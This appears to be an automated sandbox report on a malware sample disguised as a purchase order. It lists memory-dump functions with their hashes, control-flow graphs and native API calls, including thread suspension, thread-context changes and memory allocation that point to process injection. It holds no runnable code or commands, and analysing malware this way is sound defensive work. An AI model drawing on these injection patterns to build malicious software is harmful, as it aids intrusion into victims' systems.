                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: SectionView
                                                                          • String ID:
                                                                          • API String ID: 1323581903-0
                                                                          • Opcode ID: 42e425ea6a7462443631d8b6a0a837e093257fc2e9c0202ad7f6345b11b57f9c
                                                                          • Instruction ID: 8c108c30a1503a35fa8a721594d6fd6207328e0511ed23d5626443ae9fe78b90
                                                                          • Opcode Fuzzy Hash: 42e425ea6a7462443631d8b6a0a837e093257fc2e9c0202ad7f6345b11b57f9c
                                                                          • Instruction Fuzzy Hash: FE713A71E04258DFCB04CFA9C590AEDBBF6AF4D304F18816AE459B7381D238A952CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040ADA3 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 217 40ada3-40adbf 218 40adc5-40ae04 call 4097d3 217->218 219 40adc0 call 4097c3 217->219 222 40aee2-40af13 NtReadFile 218->222 223 40ae0a-40ae4f call 409863 call 42b882 call 409733 call 42b882 218->223 219->218 225 40afb0-40afbc 222->225 226 40af19-40af20 222->226 245 40ae5a-40ae60 223->245 228 40af2b-40af31 226->228 230 40af33-40af57 228->230 231 40af59-40af5d 228->231 230->228 234 40af9f-40afad call 409863 231->234 235 40af5f-40af66 231->235 234->225 238 40af71-40af77 235->238 238->234 241 40af79-40af9d 238->241 241->238 246 40ae62-40ae86 245->246 247 40ae88-40ae8c 245->247 246->245 247->222 248 40ae8e-40aea9 247->248 250 40aeb4-40aeba 248->250 250->222 251 40aebc-40aee0 250->251 251->250
                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040AF06
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 85a89d8992471b92ffb2d43eef22a062ed743e0913ce14f7d9fa0da6e664859a
                                                                          • Instruction ID: fc9d2199742c9a8d060674d21e47953af395a2044174ee8fd2e3237901ead3e6
                                                                          • Opcode Fuzzy Hash: 85a89d8992471b92ffb2d43eef22a062ed743e0913ce14f7d9fa0da6e664859a
                                                                          • Instruction Fuzzy Hash: DB713DB1E14258DFCB04CFA9C490AEDBBF5BF4D304F18816AE459B7341D234A952CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B623 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 253 40b623-40b684 call 4097c3 call 4097d3 258 40b762-40b787 NtAllocateVirtualMemory 253->258 259 40b68a-40b6cf call 409863 call 42b882 call 409733 call 42b882 253->259 260 40b824-40b830 258->260 261 40b78d-40b794 258->261 281 40b6da-40b6e0 259->281 263 40b79f-40b7a5 261->263 265 40b7a7-40b7cb 263->265 266 40b7cd-40b7d1 263->266 265->263 269 40b813-40b821 call 409863 266->269 270 40b7d3-40b7da 266->270 269->260 273 40b7e5-40b7eb 270->273 273->269 276 40b7ed-40b811 273->276 276->273 282 40b6e2-40b706 281->282 283 40b708-40b70c 281->283 282->281 283->258 285 40b70e-40b729 283->285 286 40b734-40b73a 285->286 286->258 287 40b73c-40b760 286->287 287->286
                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B77A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: fadf59258bf36b7a3c0f85c6cf86162f688c6e76b45417ae3e42d9c532fb0ac8
                                                                          • Instruction ID: f26121f830c0f8109234ac70a2951215a16cc0557d90fb1a5981705e0bebb243
                                                                          • Opcode Fuzzy Hash: fadf59258bf36b7a3c0f85c6cf86162f688c6e76b45417ae3e42d9c532fb0ac8
                                                                          • Instruction Fuzzy Hash: 9B712A75E14158DFCB04CFA9C490AEDBBF5AF89304F18806AE459B7391D338A942CF98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040A123 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 361 40a123-40a184 call 4097c3 call 4097d3 366 40a262-40a277 NtSetContextThread 361->366 367 40a18a-40a1cf call 409863 call 42b882 call 409733 call 42b882 361->367 369 40a314-40a320 366->369 370 40a27d-40a284 366->370 389 40a1da-40a1e0 367->389 372 40a28f-40a295 370->372 374 40a297-40a2bb 372->374 375 40a2bd-40a2c1 372->375 374->372 378 40a303-40a311 call 409863 375->378 379 40a2c3-40a2ca 375->379 378->369 380 40a2d5-40a2db 379->380 380->378 383 40a2dd-40a301 380->383 383->380 390 40a1e2-40a206 389->390 391 40a208-40a20c 389->391 390->389 391->366 393 40a20e-40a229 391->393 394 40a234-40a23a 393->394 394->366 395 40a23c-40a260 394->395 395->394
                                                                          APIs
                                                                          • NtSetContextThread.NTDLL(?,?), ref: 0040A26A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: 8e1b16207460c74ecb583fa993db847e50e0fae833e5e0f8ab41b91e0412513e
                                                                          • Instruction ID: 9b1aa35c00d12f4d4ec830877887629837b7e68d82d172a387a58b949419f852
                                                                          • Opcode Fuzzy Hash: 8e1b16207460c74ecb583fa993db847e50e0fae833e5e0f8ab41b91e0412513e
                                                                          • Instruction Fuzzy Hash: 32714D71E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE859B7381D239A952DF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B213 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 397 40b213-40b22f 398 40b235-40b274 call 4097d3 397->398 399 40b230 call 4097c3 397->399 402 40b352-40b368 NtDelayExecution 398->402 403 40b27a-40b2bf call 409863 call 42b882 call 409733 call 42b882 398->403 399->398 405 40b405-40b411 402->405 406 40b36e-40b375 402->406 425 40b2ca-40b2d0 403->425 408 40b380-40b386 406->408 410 40b388-40b3ac 408->410 411 40b3ae-40b3b2 408->411 410->408 413 40b3f4-40b402 call 409863 411->413 414 40b3b4-40b3bb 411->414 413->405 416 40b3c6-40b3cc 414->416 416->413 419 40b3ce-40b3f2 416->419 419->416 426 40b2d2-40b2f6 425->426 427 40b2f8-40b2fc 425->427 426->425 427->402 429 40b2fe-40b319 427->429 430 40b324-40b32a 429->430 430->402 431 40b32c-40b350 430->431 431->430
                                                                          APIs
                                                                          • NtDelayExecution.NTDLL(0041A6B1,?,?,?,00000000), ref: 0040B35B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DelayExecution
                                                                          • String ID:
                                                                          • API String ID: 1249177460-0
                                                                          • Opcode ID: b72b665b74fb54d89f454fa359837e64855619780894ba6584d0cb01522ea78b
                                                                          • Instruction ID: 3be60250fe5fbc5b7b76b1735ee417b9946c579d890d9e13bfe27a8a66749d08
                                                                          • Opcode Fuzzy Hash: b72b665b74fb54d89f454fa359837e64855619780894ba6584d0cb01522ea78b
                                                                          • Instruction Fuzzy Hash: 09712E71D14158DBCB05CFA9C490AEDBBF1EF49304F1880AAE859B7341D738AA41DF98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409D23 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 289 409d23-409d84 call 4097c3 call 4097d3 294 409e62-409e77 NtSuspendThread 289->294 295 409d8a-409dcf call 409863 call 42b882 call 409733 call 42b882 289->295 296 409f14-409f20 294->296 297 409e7d-409e84 294->297 317 409dda-409de0 295->317 299 409e8f-409e95 297->299 301 409e97-409ebb 299->301 302 409ebd-409ec1 299->302 301->299 305 409f03-409f11 call 409863 302->305 306 409ec3-409eca 302->306 305->296 310 409ed5-409edb 306->310 310->305 313 409edd-409f01 310->313 313->310 318 409de2-409e06 317->318 319 409e08-409e0c 317->319 318->317 319->294 320 409e0e-409e29 319->320 322 409e34-409e3a 320->322 322->294 323 409e3c-409e60 322->323 323->322
                                                                          APIs
                                                                          • NtSuspendThread.NTDLL(?,?), ref: 00409E6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: SuspendThread
                                                                          • String ID:
                                                                          • API String ID: 3178671153-0
                                                                          • Opcode ID: adcfe1a8fc1bb45aaabbcc311c2c61f2764369a01feb8d5aeeaa2fe2c21b4f98
                                                                          • Instruction ID: e47e113cf92a57b1ac52dd662de8fcc24e3456a203539e49cba6bfabcd542c9a
                                                                          • Opcode Fuzzy Hash: adcfe1a8fc1bb45aaabbcc311c2c61f2764369a01feb8d5aeeaa2fe2c21b4f98
                                                                          • Instruction Fuzzy Hash: 55711C71E14158DFCB04CFA9C490AEDBBF5AF49314F18806AE459B7382D638AD42DB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409F23 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 325 409f23-409f84 call 4097c3 call 4097d3 330 40a062-40a077 NtGetContextThread 325->330 331 409f8a-409fcf call 409863 call 42b882 call 409733 call 42b882 325->331 333 40a114-40a120 330->333 334 40a07d-40a084 330->334 353 409fda-409fe0 331->353 335 40a08f-40a095 334->335 338 40a097-40a0bb 335->338 339 40a0bd-40a0c1 335->339 338->335 341 40a103-40a111 call 409863 339->341 342 40a0c3-40a0ca 339->342 341->333 346 40a0d5-40a0db 342->346 346->341 349 40a0dd-40a101 346->349 349->346 354 409fe2-40a006 353->354 355 40a008-40a00c 353->355 354->353 355->330 356 40a00e-40a029 355->356 358 40a034-40a03a 356->358 358->330 359 40a03c-40a060 358->359 359->358
                                                                          APIs
                                                                          • NtGetContextThread.NTDLL(?,?), ref: 0040A06A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: c486c64c00cd5f5b8c72e1e55815e763dc87eb2ab1f6ce2e21a35978956b8d16
                                                                          • Instruction ID: cb0abd5b403f6b9fc28d3a6aa314449394bfc664419b332a47aa0db7b876805e
                                                                          • Opcode Fuzzy Hash: c486c64c00cd5f5b8c72e1e55815e763dc87eb2ab1f6ce2e21a35978956b8d16
                                                                          • Instruction Fuzzy Hash: 52714C71E0425CDFCB04CFA9C490AEDBBF1AF49304F1880AAE459B7381D239AA52CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004173F3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 433 4173f3-41740f 434 417417-41741c 433->434 435 417412 call 42af83 433->435 436 417422-417430 call 42b4a3 434->436 437 41741e-417421 434->437 435->434 440 417440-417451 call 429943 436->440 441 417432-41743d call 42b723 436->441 446 417453-417467 LdrLoadDll 440->446 447 41746a-41746d 440->447 441->440 446->447
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417465
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                          • Instruction ID: 1361856df78bc134776308968c2a22ed589fa1034180a1cbb88d919f5dfdd5b0
                                                                          • Opcode Fuzzy Hash: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                          • Instruction Fuzzy Hash: 85011EB5E4020DABDB10DAA5ED42FDEB7789B54308F00819AE90897241F635EB588B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00428453 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtClose.NTDLL(0041A658,?,?,00000000,?,0041A658,?,?,?,?,?,?,?,?,00000000,?), ref: 0042848A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                          • Instruction ID: 8f31afb53f65978ff8a5df44bbc3e5722fab298bbb2beb57612707ad3f89b0d5
                                                                          • Opcode Fuzzy Hash: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                          • Instruction Fuzzy Hash: 0EE086712106147BD120FA5ADC41F97B76CEFC6715F40801AFA08AB242C670790587F5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01922B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: eae6dcd2cd1b7b4042991dfd7c712071ed8b812922f4499468eb7bb80210afc3
                                                                          • Instruction ID: 0433162b98b6ca8b021dbc61ceff8f2529c3bd639752f7f925894500b5aadeb3
                                                                          • Opcode Fuzzy Hash: eae6dcd2cd1b7b4042991dfd7c712071ed8b812922f4499468eb7bb80210afc3
                                                                          • Instruction Fuzzy Hash: 4690026520250003410571584418616805E97E0201B55C121F105C590DC52589927225
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01922DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9ca80ce44b7090cc1c72eb96e2f40e2cb487e33acd732914aea03d3a711c5fef
                                                                          • Instruction ID: 6cfcecf727fa4df7e862cebe9961feee575a7940de723b4137a22e4f14e8f7be
                                                                          • Opcode Fuzzy Hash: 9ca80ce44b7090cc1c72eb96e2f40e2cb487e33acd732914aea03d3a711c5fef
                                                                          • Instruction Fuzzy Hash: C690023520150413D11171584508707405D97D0241F95C512B046C558DD6568A53B221
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01922C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4a93a0d7a74b63b3217925cf75209a9512130ccb1793675bb47bc562ecb07a10
                                                                          • Instruction ID: dad3116ab399efac562d2ea2bc2740306a9fe21b9efcde6a85ec6ab02d50f62e
                                                                          • Opcode Fuzzy Hash: 4a93a0d7a74b63b3217925cf75209a9512130ccb1793675bb47bc562ecb07a10
                                                                          • Instruction Fuzzy Hash: 5E90023520158802D1107158840874A405997D0301F59C511B446C658DC69589927221
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 019235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a1819aad8f29516377541dcf1e89ba7488e82e63ebfcfb060ee8752c44e04c72
                                                                          • Instruction ID: c9781f81a5fd2d88f5cdc1f712d82d15aebb1faaa0dff363f9b8ee2d10c821bc
                                                                          • Opcode Fuzzy Hash: a1819aad8f29516377541dcf1e89ba7488e82e63ebfcfb060ee8752c44e04c72
                                                                          • Instruction Fuzzy Hash: 8F90023560560402D10071584518706505997D0201F65C511B046C568DC7958A5276A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00413A8D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 36 413a8d-413a90 37 413b01-413b02 36->37 38 413a92 36->38 39 413a93-413aa2 38->39 40 413ac9-413aca 38->40 41 413aa4-413aac 39->41 42 413a4f-413a52 39->42 40->39 43 413acc-413ace 40->43 44 413adf 41->44 43->44 45 413af4-413b42 43->45 46 413ae1-413ae6 44->46 47 413ae8-413aee 44->47 51 413b54-413b5d 45->51 52 413b44-413b4c 45->52 46->47 49 413af0-413af3 47->49 50 413b6f-413b8b 47->50 49->45 53 413bfd-413c5d call 42a323 call 42ad33 call 4173f3 call 4046e3 call 423e53 50->53 54 413b8d-413bea 50->54 51->50 52->51 68 413c7d-413c83 53->68 69 413c5f-413c6e PostThreadMessageW 53->69 69->68 70 413c70-413c7a 69->70 70->68
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 7e327r58$7e327r58
                                                                          • API String ID: 0-4105805501
                                                                          • Opcode ID: d45de8c7b50298374bac702908ff5e65982283c5d550219a6107e280cf31b49d
                                                                          • Instruction ID: cd7b0ebc4f312fe051f5a44f46a53db313936eba4b75457889bdb1bd7ecce334
                                                                          • Opcode Fuzzy Hash: d45de8c7b50298374bac702908ff5e65982283c5d550219a6107e280cf31b49d
                                                                          • Instruction Fuzzy Hash: BC41C333549289AEC7029F745C415DEBF78EE81365B5841DFE4809B503D22A5B87C7C6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00413BEB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 71 413beb-413c05 73 413c0d-413c5d call 42ad33 call 4173f3 call 4046e3 call 423e53 71->73 74 413c08 call 42a323 71->74 83 413c7d-413c83 73->83 84 413c5f-413c6e PostThreadMessageW 73->84 74->73 84->83 85 413c70-413c7a 84->85 85->83
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7e327r58$7e327r58
                                                                          • API String ID: 1836367815-4105805501
                                                                          • Opcode ID: adcceddb6a4681dd82a74107d39f3fbb2828151b626a08a6d540b20f6b9e8212
                                                                          • Instruction ID: 5cd8f1ba56ca66e7765762b9b338afedcaf28b67fd49832bfc28183128bb71e6
                                                                          • Opcode Fuzzy Hash: adcceddb6a4681dd82a74107d39f3fbb2828151b626a08a6d540b20f6b9e8212
                                                                          • Instruction Fuzzy Hash: AE01A572D0015C7ADB10AAE19C81DEFBB7CDF41798F408169FE1467240E57C4F468BA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00413BF3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 86 413bf3-413c05 87 413c0d-413c5d call 42ad33 call 4173f3 call 4046e3 call 423e53 86->87 88 413c08 call 42a323 86->88 97 413c7d-413c83 87->97 98 413c5f-413c6e PostThreadMessageW 87->98 88->87 98->97 99 413c70-413c7a 98->99 99->97
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7e327r58$7e327r58
                                                                          • API String ID: 1836367815-4105805501
                                                                          • Opcode ID: 68306d0fe5426d68deaf2a8dbc272079cdc72e99b8a943e4d65e1200b1802fd1
                                                                          • Instruction ID: 2b11c294a3421bd6dee33fc7c99cb899cc9a872ef9e39964c471318ebb4cf5bc
                                                                          • Opcode Fuzzy Hash: 68306d0fe5426d68deaf2a8dbc272079cdc72e99b8a943e4d65e1200b1802fd1
                                                                          • Instruction Fuzzy Hash: E101C4B2D0015C7ADB00AAE19C81DEF7B7CDF41698F408069FE14B7240E57C4F068BA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00428763 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(004122B5,?,004122B5,?,00000000,004122B5,?,004122B5,?,?), ref: 004287A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                          • Instruction ID: 2c1a71614233d00c30b3bb4d428e9b765d3603c09bbdcb5fe6948e3b9beed476
                                                                          • Opcode Fuzzy Hash: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                          • Instruction Fuzzy Hash: B4E092B22043487BD610EE99EC81FDB37ACEFC5710F404419F908A7241C670BD108BB8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00428713 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00419A10,?,?,00419A10,?,?,?,00419A10,?,00002000), ref: 0042874F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                          • Instruction ID: 6bdbf4cad4e37bd7c73d14c5b69e3c11c0b4df46002673f412cfc2a151788784
                                                                          • Opcode Fuzzy Hash: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                          • Instruction Fuzzy Hash: 88E06DB1204204BBD610EE59EC42EAB77ACEFC5710F40401AF908A7241C670BD108BB8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004287B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,00000000,?,?,4CF2BAE6,?,?,4CF2BAE6), ref: 004287E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: 5f2d11c3415c3880341c2dde1694300776f6da084e27cb50d6fd970313eaf6a5
                                                                          • Instruction ID: a70d2caf07bf9b91732c47b13bc5c2eba1b16618381eb4ebddd6603121694906
                                                                          • Opcode Fuzzy Hash: 5f2d11c3415c3880341c2dde1694300776f6da084e27cb50d6fd970313eaf6a5
                                                                          • Instruction Fuzzy Hash: 0AE04F712442547BD220AA6AEC41FD7776CDBC5754F40411AFA18A7282C6707A058BE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01922C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
